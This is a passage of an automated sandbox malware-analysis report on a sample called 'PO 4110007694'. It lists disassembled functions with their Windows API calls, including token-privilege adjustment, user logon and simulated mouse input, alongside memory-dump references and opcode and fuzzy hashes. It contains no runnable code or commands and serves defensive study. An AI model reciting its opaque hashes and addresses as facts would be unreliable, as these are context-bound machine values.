                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00C7B40B
                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00C7B465
                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00C7B4B2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                    • String ID:
                                                                    • API String ID: 1682464887-0
                                                                    • Opcode ID: df7b43f5235fa8eb3d8722f635050ee484cc59204d6761af7691a888c5138bdc
                                                                    • Instruction ID: ca1a654c3f50efb31203003f85b3d8a172917858be0a96c3fe1e4fd90384c9c0
                                                                    • Opcode Fuzzy Hash: df7b43f5235fa8eb3d8722f635050ee484cc59204d6761af7691a888c5138bdc
                                                                    • Instruction Fuzzy Hash: 6B215C35A00508EFCB00EFA5D884BEDBBB8FF49310F1480AAE905EB361CB319956DB55
                                                                    Function 00C687E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C30DB6: std::exception::exception.LIBCMT ref: 00C30DEC
                                                                      • Part of subcall function 00C30DB6: __CxxThrowException@8.LIBCMT ref: 00C30E01
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C6882B
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C68858
                                                                    • GetLastError.KERNEL32 ref: 00C68865
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 1922334811-0
                                                                    • Opcode ID: 4e8543acb118f845301ce5a2ec337ad314a3cad73a18a429ef4401f03e7d0f31
                                                                    • Instruction ID: 37dcf173fd9ceec79217a9cd9bf39346ed3ea90bd086863c223b0f0c05df18cb
                                                                    • Opcode Fuzzy Hash: 4e8543acb118f845301ce5a2ec337ad314a3cad73a18a429ef4401f03e7d0f31
                                                                    • Instruction Fuzzy Hash: B3119DB2414204AFE728DFA4DCC5E2BB7ECEB04310B20862EE49583241EA70AC018B60
                                                                    Function 00C6874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00C68774
                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C6878B
                                                                    • FreeSid.ADVAPI32(?), ref: 00C6879B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                    • String ID:
                                                                    • API String ID: 3429775523-0
                                                                    • Opcode ID: 385f274a6caacc0bea90430656ee5af46be9893a17fddc523cbdbab58d84b68e
                                                                    • Instruction ID: f28e4b98b37d7a5a2e2241620705b3e1fd9f606da5009e3e62da9b99390255a0
                                                                    • Opcode Fuzzy Hash: 385f274a6caacc0bea90430656ee5af46be9893a17fddc523cbdbab58d84b68e
                                                                    • Instruction Fuzzy Hash: 27F04975A1130CBFDF00DFF4DC89AAEBBBCEF08201F1045A9A901E2181E775AA048B50
                                                                    Function 00C7C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00C7C6FB
                                                                    • FindClose.KERNEL32(00000000), ref: 00C7C72B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2295610775-0
                                                                    • Opcode ID: fbb86a9003fb6e6e552e1e48e18276bfe773a1e24ccd62dd1bc2247758f96326
                                                                    • Instruction ID: 9f0ef7098e9b14a21ea97abda16e79106b9ecb60020cb2a0770aa9e0b03217f9
                                                                    • Opcode Fuzzy Hash: fbb86a9003fb6e6e552e1e48e18276bfe773a1e24ccd62dd1bc2247758f96326
                                                                    • Instruction Fuzzy Hash: A51182716006009FDB10DF29D895A6AF7E8FF45320F00C51EF9A9C7290DB30A901DB81
                                                                    Function 00C7A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00C89468,?,00C9FB84,?), ref: 00C7A097
                                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00C89468,?,00C9FB84,?), ref: 00C7A0A9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFormatLastMessage
                                                                    • String ID:
                                                                    • API String ID: 3479602957-0
                                                                    • Opcode ID: 3eba7cb92c9ae13c1d908b7b42dce76238b982d8c098c31174c01c4906a68247
                                                                    • Instruction ID: 09033ec05b4d62a47296a232bc5f4b218581a42e7ecc9a97bd68132cedff9a13
                                                                    • Opcode Fuzzy Hash: 3eba7cb92c9ae13c1d908b7b42dce76238b982d8c098c31174c01c4906a68247
                                                                    • Instruction Fuzzy Hash: 7CF0A03510522DBBDB21AFA4DC48FEE776CFF09361F00826AF919D7191DA309A40DBA1
                                                                    Function 00C681CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C68309), ref: 00C681E0
                                                                    • CloseHandle.KERNEL32(?,?,00C68309), ref: 00C681F2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                    • String ID:
                                                                    • API String ID: 81990902-0
                                                                    • Opcode ID: bb53d4c8ebedbbce5405257639ad5482e8414e251a5eba8dc95d9d638699db73
                                                                    • Instruction ID: 8fd92dbd591bd7ea2568feee38d9ab12a7e3a21b546e2e2ca361c75b6a1108d1
                                                                    • Opcode Fuzzy Hash: bb53d4c8ebedbbce5405257639ad5482e8414e251a5eba8dc95d9d638699db73
                                                                    • Instruction Fuzzy Hash: 4EE0E672010510AFE7252B70FC09E7B77EDEF04310B24892DF4A5C4470DB629C91DB10
                                                                    Function 00C3A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00C38D57,?,?,?,00000001), ref: 00C3A15A
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00C3A163
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: 494a222a0648cce14168f1330f0500f275f8d33183b26a94f5000dcd9c738b0e
                                                                    • Instruction ID: 2b1b7b08e841003e27d8b5c78594a10929d94d6b13a1f19c30996b8a74d39391
                                                                    • Opcode Fuzzy Hash: 494a222a0648cce14168f1330f0500f275f8d33183b26a94f5000dcd9c738b0e
                                                                    • Instruction Fuzzy Hash: 80B09231054208EBCA002BA1EC0DB8C3F68FB44BA2F404026F60DC4070CB6654A28A91
                                                                    Function 00C1E6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • Variable must be of type 'Object'., xrefs: 00C53E62
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Variable must be of type 'Object'.
                                                                    • API String ID: 0-109567571
                                                                    • Opcode ID: 75ca4cf6667876d82d1dde3719db03b9e79666cdcde4da1286ec3dd14a6e4d25
                                                                    • Instruction ID: 254260522050af9f86aeff8acf93622cf9f34de2331f6c31cad867b07ce0679b
                                                                    • Opcode Fuzzy Hash: 75ca4cf6667876d82d1dde3719db03b9e79666cdcde4da1286ec3dd14a6e4d25
                                                                    • Instruction Fuzzy Hash: 18A26975A00215CBCB24CF59C490AEEB7B1FF5A314F248069EC16AB351D771EE86EB90
                                                                    Function 00C3F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6378527684d87364da35d07a80f82d3aa18cff836760715a603a6d9ce457831c
                                                                    • Instruction ID: 30ad15047e77e2c8119cdf5dfc68cc5dd2b7deab6a8151fa3570aa999d0499be
                                                                    • Opcode Fuzzy Hash: 6378527684d87364da35d07a80f82d3aa18cff836760715a603a6d9ce457831c
                                                                    • Instruction Fuzzy Hash: D732F471D69F014ED7279634DC32339A249AFB73D8F15DB3BE829B69A5EB28C5834100
                                                                    Function 00C4242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 85070980f6c0d752495fdff8d1882f73b0aa683463af42a2e9eaa9faa0ac510f
                                                                    • Instruction ID: d0e063603effe260ab662a8cbd86ee4851cdce71517b0896af7763837ac97024
                                                                    • Opcode Fuzzy Hash: 85070980f6c0d752495fdff8d1882f73b0aa683463af42a2e9eaa9faa0ac510f
                                                                    • Instruction Fuzzy Hash: DFB10131D2AF404DD7639639883133ABA5CAFBB2D9F91D71BFC2675D22EB2185838141
                                                                    Function 00C78889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __time64.LIBCMT ref: 00C7889B
                                                                      • Part of subcall function 00C3520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00C78F6E,00000000,?,?,?,?,00C7911F,00000000,?), ref: 00C35213
                                                                      • Part of subcall function 00C3520A: __aulldiv.LIBCMT ref: 00C35233
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                                    • String ID:
                                                                    • API String ID: 2893107130-0
                                                                    • Opcode ID: c2c7c8c75ff53594189dc86e4962b51866b7f1e69fb9c1a6ea6cb0ac475c9d24
                                                                    • Instruction ID: 8d9e2bfe0b86f434376931189b417db957195e87ff9c8c36d7d032c1a979cffe
                                                                    • Opcode Fuzzy Hash: c2c7c8c75ff53594189dc86e4962b51866b7f1e69fb9c1a6ea6cb0ac475c9d24
                                                                    • Instruction Fuzzy Hash: 1A21AF726356108BC729CF29D841B56B3E1EBA5321B688E6DD1F9CB2C0CA34A949CB54
                                                                    Function 00C74C53 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00C74C76
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: mouse_event
                                                                    • String ID:
                                                                    • API String ID: 2434400541-0
                                                                    • Opcode ID: 7a704c6d4e4438b9bcd57642861850a4d520bf686fab08301d5e86fdc54d48d2
                                                                    • Instruction ID: 86213bd6a11700aeb5927abeeb063952c0ff89bc97c0ae3f685910e858e704d3
                                                                    • Opcode Fuzzy Hash: 7a704c6d4e4438b9bcd57642861850a4d520bf686fab08301d5e86fdc54d48d2
                                                                    • Instruction Fuzzy Hash: ECD05EA016260879EC2D07208E4FF7A1109E380781FC4C14A7259C90C0EBD15D40A037
                                                                    Function 00C687B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00C68389), ref: 00C687D1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: LogonUser
                                                                    • String ID:
                                                                    • API String ID: 1244722697-0
                                                                    • Opcode ID: 11c099b1a7fbe036bc7075f667a5c2fd247b9242ac981614a1cd8cc30a136287
                                                                    • Instruction ID: 0ee946abdd76bea952c23f71c8427e7555c38549c773f4883e44232c2bb4d16a
                                                                    • Opcode Fuzzy Hash: 11c099b1a7fbe036bc7075f667a5c2fd247b9242ac981614a1cd8cc30a136287
                                                                    • Instruction Fuzzy Hash: 73D05E3226450EABEF018EA4DC05EAE3B69EB04B01F408111FE15C50A1C775D835AB60
                                                                    Function 00C3A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00C3A12A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: 636273fcc5d75cba38d821d6b2c9e8dbadf2f01555d4246a9db4fc54d23339ca
                                                                    • Instruction ID: f05f6767ecc3c7bb64b0a94145c461a2b99be22b8da50cb36656a227a1fbff7f
                                                                    • Opcode Fuzzy Hash: 636273fcc5d75cba38d821d6b2c9e8dbadf2f01555d4246a9db4fc54d23339ca
                                                                    • Instruction Fuzzy Hash: D2A0123000010CE78A001B51EC085487F5CE6001907004021F40C80031873254514580
                                                                    Function 00C28808 Relevance: .6, Instructions: 590COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 566fb19b8c2a68202a15c2cbc7812a22638d80fe40d765860ec9252b02855b9c
                                                                    • Instruction ID: f1d4363f3f41f3aeed2e298e5ed1495baf382ee6008833d6fa18800ac386c413
                                                                    • Opcode Fuzzy Hash: 566fb19b8c2a68202a15c2cbc7812a22638d80fe40d765860ec9252b02855b9c
                                                                    • Instruction Fuzzy Hash: 8F222330A05626CBDF38CA25E5D477CB7A1FF01304F38806AD9668B9A2DF709ED9D641
                                                                    Function 00C321C5 Relevance: .3, Instructions: 345COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                    • Instruction ID: 0dc996623b212e0164e90183e55611423316ffced93e4bac2d795901b1b7a896
                                                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                    • Instruction Fuzzy Hash: 7DC174322251930ADF6E463AC47403EFAA15EA37B171E176DD8B3CB1D4EE20DB65D620
                                                                    Function 00C325FA Relevance: .3, Instructions: 341COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                    • Instruction ID: 2299369028f5d2c479d14c9a9ac98f9f86b5f783d3d18fb61d799ea941b5c32a
                                                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                    • Instruction Fuzzy Hash: 3CC161332151930EDF2E463AC43413EBAA15EA37B1B1E176DD8B2DB1D5EE20CA25D660
                                                                    Function 00C31978 Relevance: .3, Instructions: 323COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
